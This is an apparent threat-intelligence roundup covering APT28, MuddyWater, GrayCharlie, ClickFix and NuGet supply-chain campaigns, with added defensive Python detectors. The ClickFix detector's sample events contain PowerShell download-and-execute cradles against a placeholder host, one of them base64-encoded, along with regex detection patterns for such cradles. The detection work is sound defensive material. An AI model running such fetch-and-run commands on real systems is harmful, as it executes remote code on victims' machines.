Mixed threat reporting: APT campaigns, malware delivery via compromised web assets, and ransomware exploitation
The items collected here do not describe a single cohesive cybersecurity event; they span several unrelated threat reports and opinion pieces. Notable incident-level reporting includes APT28 activity in Western and Central Europe ("Operation MacroMaze"): spear-phishing lure documents whose INCLUDEPICTURE fields beacon to webhook[.]site, and Office macros that run VBScript, CMD and batch stages for persistence and follow-on payload delivery. Separately, MuddyWater (Iran/MOIS-linked) was reported running "Operation Olalampo" against organizations in the Middle East and Africa, delivering new custom malware (including the Char backdoor, which uses a Telegram bot for C2) and, in some cases, attempting exploitation of public-facing servers in addition to phishing.
Criminal activity and initial-access tradecraft were also covered across distinct stories. A DFIR case study described exploitation of Apache ActiveMQ CVE-2023-46604 to gain RCE, post-exploitation with Metasploit/Meterpreter (privilege escalation, LSASS access, lateral movement), and the eventual deployment of LockBit-branded ransomware over RDP using previously stolen credentials, with indications that the payload was built with the leaked LockBit builder and that the actor used Session for communications.

Several reports described malware delivery through compromised web assets and social engineering: GrayCharlie injecting malicious JavaScript into WordPress sites to push NetSupport RAT, Stealc and SectopRAT via fake browser updates and ClickFix-style fake CAPTCHAs; a separate ClickFix campaign delivering a custom C++ RAT (MIMICRAT) through fake Cloudflare verification prompts that trick users into running PowerShell; and malicious Chrome extensions using a "Promise Bomb" browser-crash technique to drive users into running fake "CrashFix" PowerShell steps. A NuGet supply-chain attack (the typosquatted NCryptYo package plus companion packages) targeted ASP.NET Identity data and enabled backdoored authorization rules.

Several other items were generic commentary or roundups (data breach trends, quantum preparedness, Enigma history, NATO public opinion polling, a recon how-to, and a malware-newsletter link list) and add no event-specific intelligence.

How this story unfolded
12 events, listed from the most recent confirmed update back to the earliest known activity.
Group-IB publicly reports new MuddyWater malware set
Group-IB publicly described Operation Olalampo as a fresh MuddyWater campaign and noted that some malware components showed signs consistent with AI-assisted development, including unusual debug strings. The report also released IoCs and detection rules to help defenders identify the activity.
LAB52 attributes MacroMaze campaign to APT28
S2 Grupo's LAB52 publicly attributed Operation MacroMaze to the Russia-linked threat actor APT28 and detailed its webhook-based macro malware workflow. The disclosure highlighted the campaign's use of native tooling and legitimate web services to minimize artifacts and evade detection.
Researchers disclose GrayCharlie targeting of US law firm websites
Researchers reported that at least fifteen US law firm websites were found injected with identical malicious JavaScript pointing to the same attacker domain. They also suspected a supply-chain compromise involving SMB Team, an IT services provider to law firms, based on stolen credentials tied to an SMB Team email address.
Socket reports NuGet supply-chain campaign and seeks takedowns
Socket's Threat Research Team disclosed that the four malicious NuGet packages had accumulated about 4,500 downloads and appeared linked by shared credentials, build artifacts, and metadata quirks. Socket said it submitted takedown requests to the NuGet security team and published defensive guidance for dependency auditing and detection.
Elastic identifies MIMICRAT ClickFix campaign
In early February 2026, Elastic analysts reported a multi-stage campaign using compromised websites and fake Cloudflare verification prompts to trick users into running PowerShell commands. The infection chain deployed a custom RAT called MIMICRAT, which supports stealth, persistence, token theft, file manipulation, and SOCKS5 tunneling.
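Both the fake Cloudflare verification prompt described above and the "CrashFix" lure in the Promise Bomb story end the same way: a user pastes a command into the Run dialog or a terminal and PowerShell runs it. That gives a telemetry hook that does not depend on the lure. The following is an added example, not code from Elastic, Annex or any of the reports: it scores Sysmon-style process-creation events for that pattern. The heuristics (explorer.exe as parent, hidden window, policy bypass, a download cradle, and decoding of -EncodedCommand payloads before matching) are assumptions drawn from generic ClickFix tradecraft rather than indicators from the MIMICRAT report, the event lines are constructed, and example.invalid is a placeholder host.

```python
"""Score process-creation events for ClickFix-style PowerShell launches.

Added example. Heuristics are assumptions drawn from generic ClickFix tradecraft
(a pasted 'verification' command run from the Win+R dialog), not indicators from
the MIMICRAT or CrashFix reporting. Events are constructed in a Sysmon-like JSON
shape; example.invalid is a placeholder host.
"""
import base64
import json
import re

ENCODED = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
HIDDEN = re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I)
BYPASS = re.compile(r"-(?:ep|executionpolicy)\s+bypass", re.I)
CRADLE = re.compile(
    r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile|curl|wget)\b", re.I)

WEIGHTS = {
    "launched from explorer.exe (Run dialog or shell)": 2,
    "download cradle": 2,
    "encoded command": 1,
    "hidden window": 1,
    "execution policy bypass": 1,
}
THRESHOLD = 4  # assumption: tune against your own baseline


def decode_encoded_command(cmd: str) -> str:
    """Append the decoded -EncodedCommand payload (base64 of UTF-16LE) so the
    cradle and hidden-window checks see what actually runs."""
    m = ENCODED.search(cmd)
    if not m:
        return cmd
    try:
        return cmd + " " + base64.b64decode(m.group(1)).decode("utf-16-le", errors="ignore")
    except (ValueError, UnicodeDecodeError):
        return cmd


def analyze_event(ev: dict) -> dict:
    """Return the weighted score and matched reasons for one process-creation event."""
    image = ev.get("Image", "").lower()
    parent = ev.get("ParentImage", "").lower()
    cmd = ev.get("CommandLine", "")
    reasons = []
    if image.endswith(("\\powershell.exe", "\\pwsh.exe")):
        if ENCODED.search(cmd):
            reasons.append("encoded command")
            cmd = decode_encoded_command(cmd)
        if parent.endswith("\\explorer.exe"):
            reasons.append("launched from explorer.exe (Run dialog or shell)")
        if HIDDEN.search(cmd):
            reasons.append("hidden window")
        if BYPASS.search(cmd):
            reasons.append("execution policy bypass")
        if CRADLE.search(cmd):
            reasons.append("download cradle")
    score = sum(WEIGHTS[r] for r in reasons)
    return {"score": score, "reasons": reasons, "flagged": score >= THRESHOLD,
            "command": ev.get("CommandLine", "")}


def scan(jsonl: str) -> list:
    """Analyze one JSON event per line."""
    return [analyze_event(json.loads(line)) for line in jsonl.splitlines() if line.strip()]


def _enc(ps: str) -> str:
    """Encode a script the way PowerShell's -EncodedCommand expects it."""
    return base64.b64encode(ps.encode("utf-16-le")).decode()


PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
# Constructed sample events.
SAMPLE_EVENTS = "\n".join(json.dumps(e) for e in [
    # 1: pasted into Win+R from a fake verification page
    {"ParentImage": "C:\\Windows\\explorer.exe", "Image": PS,
     "CommandLine": 'powershell -w hidden -ep bypass -c "iwr https://example.invalid/verify | iex"'},
    # 2: same intent; the cradle is only visible after base64 decoding
    {"ParentImage": "C:\\Windows\\explorer.exe", "Image": PS,
     "CommandLine": "powershell -nop -enc " + _enc("irm https://example.invalid/crashfix | iex")},
    # 3: routine maintenance script; a policy bypass alone should not alert
    {"ParentImage": "C:\\Windows\\System32\\svchost.exe", "Image": PS,
     "CommandLine": "powershell.exe -ExecutionPolicy Bypass -NonInteractive -File C:\\ProgramData\\Maint\\cleanup.ps1"},
])

if __name__ == "__main__":
    for r in scan(SAMPLE_EVENTS):
        print(r["flagged"], r["score"], r["reasons"])
```

The second sample event is the one worth noting: without decoding the -enc payload it scores 3 and stays under the threshold, so any rule that matches only on the raw command line misses the cradle.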
Group-IB discovers MuddyWater Operation Olalampo
On January 26, 2026, Group-IB first discovered a new MuddyWater campaign dubbed Operation Olalampo targeting organizations and individuals mainly in MENA and parts of Africa. The activity used phishing documents and, in some cases, public-facing server exploitation to deliver new malware families including Char, GhostFetch, GhostBackDoor, and HTTP_VIP, the last of which led to AnyDesk deployment.
APT28 launches Operation MacroMaze against European targets
From September 2025 through January 2026, APT28 conducted a spear-phishing campaign dubbed Operation MacroMaze against entities in Western and Central Europe. The operation used lure documents with INCLUDEPICTURE tracking beacons, evolving macro techniques, and webhook[.]site for command retrieval and exfiltration.
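An INCLUDEPICTURE beacon is a Word field, not macro code, so it can be found statically by reading the document's XML parts without opening the file. The following is an added example, not code from LAB52 or the report: it unpacks a .docx, reassembles field codes that Word splits across several instrText runs (the split is routine and defeats naive string searches), and reports any INCLUDEPICTURE whose target has a network host. It assumes webhook.site as the only beacon host of interest, which is the one the reporting names, and scans a constructed sample document whose URL path is a placeholder rather than an observed indicator.

```python
"""Scan a .docx for INCLUDEPICTURE fields that fetch an image from a remote host.

Added example; assumes webhook.site as the beacon host of interest (the one named
in the reporting) and a constructed sample document, not an observed lure.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
W = "{%s}" % W_NS
BEACON_HOSTS = {"webhook.site"}  # assumption: extend with your own list
FIELD_RE = re.compile(r'^\s*INCLUDEPICTURE\s+"?([^"\s\\]+)', re.IGNORECASE)


def field_codes(part_xml: bytes):
    """Yield every field code in a WordprocessingML part.

    Simple fields keep the code in w:fldSimple/@w:instr. Complex fields spread it
    over runs: fldChar begin, one or more instrText runs, fldChar separate/end.
    The code is often split across several instrText runs, so concatenate them.
    Nested fields are not handled.
    """
    root = ET.fromstring(part_xml)
    for fs in root.iter(W + "fldSimple"):
        yield fs.get(W + "instr", "")
    in_code, buf = False, []
    for el in root.iter():
        if el.tag == W + "fldChar":
            kind = el.get(W + "fldCharType")
            if kind == "begin":
                in_code, buf = True, []
            elif kind in ("separate", "end") and in_code:
                in_code = False
                if "".join(buf).strip():
                    yield "".join(buf)
        elif in_code and el.tag == W + "instrText":
            buf.append(el.text or "")


def find_remote_includepicture(docx_bytes: bytes) -> list:
    """Return one finding per INCLUDEPICTURE whose target has a network host."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        # Beacons are commonly placed in headers/footers, so scan every XML part.
        for name in (n for n in z.namelist() if n.startswith("word/") and n.endswith(".xml")):
            for code in field_codes(z.read(name)):
                m = FIELD_RE.match(code)
                if not m:
                    continue
                host = urlparse(m.group(1)).hostname or ""
                if not host:
                    continue  # local path: not a beacon
                findings.append({
                    "part": name,
                    "url": m.group(1),
                    "host": host,
                    "known_beacon": host in BEACON_HOSTS,
                    # \d tells Word not to store the image data, so it is fetched on open
                    "refetch_on_open": "\\d" in code,
                })
    return findings


def build_sample_docx() -> bytes:
    """Constructed .docx: one remote INCLUDEPICTURE split over two instrText runs
    (a webhook.site URL with a placeholder path) and one benign local one."""
    doc = f'''<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<w:document xmlns:w="{W_NS}"><w:body>
<w:p>
 <w:r><w:fldChar w:fldCharType="begin"/></w:r>
 <w:r><w:instrText xml:space="preserve"> INCLUDEPICTURE "https://webhook.site/</w:instrText></w:r>
 <w:r><w:instrText xml:space="preserve">placeholder-token/pixel.png" \\d </w:instrText></w:r>
 <w:r><w:fldChar w:fldCharType="separate"/></w:r>
 <w:r><w:fldChar w:fldCharType="end"/></w:r>
</w:p>
<w:p><w:fldSimple w:instr=' INCLUDEPICTURE "C:\\images\\logo.png" '><w:r><w:t/></w:r></w:fldSimple></w:p>
<w:p><w:r><w:t>Lure text goes here</w:t></w:r></w:p>
</w:body></w:document>'''
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", doc)
    return buf.getvalue()


if __name__ == "__main__":
    for finding in find_remote_includepicture(build_sample_docx()):
        print(finding)
```

Run it against a mail gateway quarantine or a sandbox drop folder and treat any remote host as worth a look; a hit on a known beacon service with the \d switch is the tracking-pixel pattern the report describes.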
GrayCharlie infrastructure expands through 2025
Researchers observed two main NetSupport RAT command-and-control clusters associated with GrayCharlie being deployed steadily through 2025. The infrastructure used distinct TLS certificate naming patterns, license keys, and serial numbers, with hosting linked in part to MivoCloud and HZ Hosting Ltd.
Malicious NuGet packages published to target ASP.NET developers
Between August 12 and August 21, 2024, four malicious NuGet packages — NCryptYo, DOMOAuth2_, IRAOAuth2.0, and SimpleWriter_ — were published by the account "hamzazaheer." The packages were designed to backdoor ASP.NET applications through JIT hooking, localhost proxying, credential and authorization-data theft, and attacker-controlled authorization responses.
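Socket's defensive guidance on dependency auditing comes down to checking what a project actually references before it is restored. The following is an added example, not Socket's tooling: it walks a .csproj (or packages.config), matches package IDs against the four names from the disclosure, flags the cosmetic-suffix pattern visible in SimpleWriter_ and IRAOAuth2.0, and reports IDs within a small edit distance of a vetted allowlist. The allowlist, the project file and its version numbers are constructed for the example, and the suffix heuristic is an assumption.

```python
"""Audit NuGet package references for known-malicious and look-alike package IDs.

Added example illustrating the dependency-auditing guidance; the four malicious
IDs are the ones named in Socket's disclosure, the trusted list and the project
file are constructed for the example, and the naming heuristics are assumptions.
"""
import re
import xml.etree.ElementTree as ET

KNOWN_MALICIOUS = {"ncryptyo", "domoauth2_", "iraoauth2.0", "simplewriter_"}

# Constructed allowlist: package IDs the organization has vetted.
TRUSTED = [
    "Microsoft.AspNetCore.Identity.EntityFrameworkCore",
    "Microsoft.EntityFrameworkCore.SqlServer",
    "Newtonsoft.Json",
    "Serilog",
]
# Heuristic: a trailing underscore or trailing ".<digits>" mimics a real ID with
# a cosmetic suffix (as in SimpleWriter_ / IRAOAuth2.0).
ODD_SUFFIX = re.compile(r"(_|\.\d+)$")


def _norm(s: str) -> str:
    """Lowercase and drop punctuation so near-miss comparison ignores separators."""
    return re.sub(r"[^a-z0-9]", "", s.lower())


def levenshtein(a: str, b: str) -> int:
    """Edit distance with a single rolling row."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def package_ids(project_xml: str):
    """Yield (id, version) from PackageReference (csproj) or package (packages.config)."""
    for el in ET.fromstring(project_xml).iter():
        tag = el.tag.rsplit("}", 1)[-1]  # drop the MSBuild namespace if present
        if tag == "PackageReference" and el.get("Include"):
            yield el.get("Include"), el.get("Version", "")
        elif tag == "package" and el.get("id"):
            yield el.get("id"), el.get("version", "")


def audit(project_xml: str, trusted=TRUSTED, max_dist: int = 2) -> dict:
    """Map each suspicious package ID to the reasons it was flagged."""
    findings = {}
    for pid, _version in package_ids(project_xml):
        reasons = []
        if pid.lower() in KNOWN_MALICIOUS:
            reasons.append("listed as malicious")
        if ODD_SUFFIX.search(pid):
            reasons.append("odd trailing suffix")
        if pid not in trusted:
            for t in trusted:
                d = levenshtein(_norm(pid), _norm(t))
                if 0 < d <= max_dist:
                    reasons.append(f"near-miss of trusted package {t}")
        if reasons:
            findings[pid] = reasons
    return findings


# Constructed project file; Newtonsoft.Jsonn is an invented look-alike.
SAMPLE_CSPROJ = """<Project Sdk="Microsoft.NET.Sdk.Web">
  <ItemGroup>
    <PackageReference Include="Microsoft.AspNetCore.Identity.EntityFrameworkCore" Version="8.0.0" />
    <PackageReference Include="Newtonsoft.Jsonn" Version="13.0.3" />
    <PackageReference Include="NCryptYo" Version="1.0.0" />
    <PackageReference Include="SimpleWriter_" Version="1.0.2" />
  </ItemGroup>
</Project>"""

if __name__ == "__main__":
    for pid, why in audit(SAMPLE_CSPROJ).items():
        print(pid, "->", "; ".join(why))
```

The name checks are a first pass only; the shared publisher account, build artifacts and metadata quirks that linked the four packages are visible on the registry, not in the project file, and need a registry-side check.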
Attacker re-enters via unpatched ActiveMQ flaw and deploys ransomware
Eighteen days after the first intrusion, the same actor returned through the still-unpatched Apache ActiveMQ vulnerability, reused prior C2 infrastructure, enabled RDP, installed AnyDesk, and conducted additional scanning. Ransomware consistent with LockBit, but assessed as likely built with the leaked LockBit builder, was then deployed interactively across servers including backup and file servers.
Apache ActiveMQ server first exploited for initial access
In mid-February 2024, a threat actor exploited CVE-2023-46604 on an internet-facing Apache ActiveMQ server to gain remote code execution and establish a foothold on a Windows host. The attacker downloaded a Metasploit stager, escalated privileges, dumped LSASS, scanned via SMB, and moved laterally before being evicted about a day later.
GrayCharlie begins WordPress malware campaign
GrayCharlie has been active since mid-2023, compromising WordPress sites and injecting malicious JavaScript to deliver malware such as NetSupport RAT, Stealc, and SectopRAT to site visitors. The campaign relied on fake browser updates and ClickFix-style fake CAPTCHA lures.
Sources
7 references.
APT28 Targeted European Entities Using Webhook-Based Macro Malware (thehackernews.com)
GrayCharlie Injects Malicious JavaScript into WordPress Sites to Deliver NetSupport RAT and Stealc (cybersecuritynews.com)
New MIMICRAT Custom RAT Uncovered in Sophisticated Multi-Stage ClickFix Campaign (cybersecuritynews.com)
Four Malicious NuGet Packages Target ASP.NET Developers With... (socket.dev)
Apache ActiveMQ Exploit Leads to LockBit Ransomware (thedfirreport.com)
Promise Bomb crashes browsers to install malware (annex.security)
Iran's MuddyWater Targets Orgs With Fresh Malware as Tensions Mount (darkreading.com)